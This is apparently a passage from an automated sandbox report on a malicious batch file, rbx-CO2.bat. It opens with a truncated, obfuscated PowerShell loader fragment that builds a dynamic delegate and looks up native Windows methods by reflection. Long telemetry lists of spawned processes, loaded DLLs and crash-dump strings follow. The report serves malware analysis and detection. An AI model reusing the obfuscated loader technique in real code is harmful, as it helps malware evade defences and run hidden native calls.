'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)
+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dll
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: rbx-CO2.bat Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
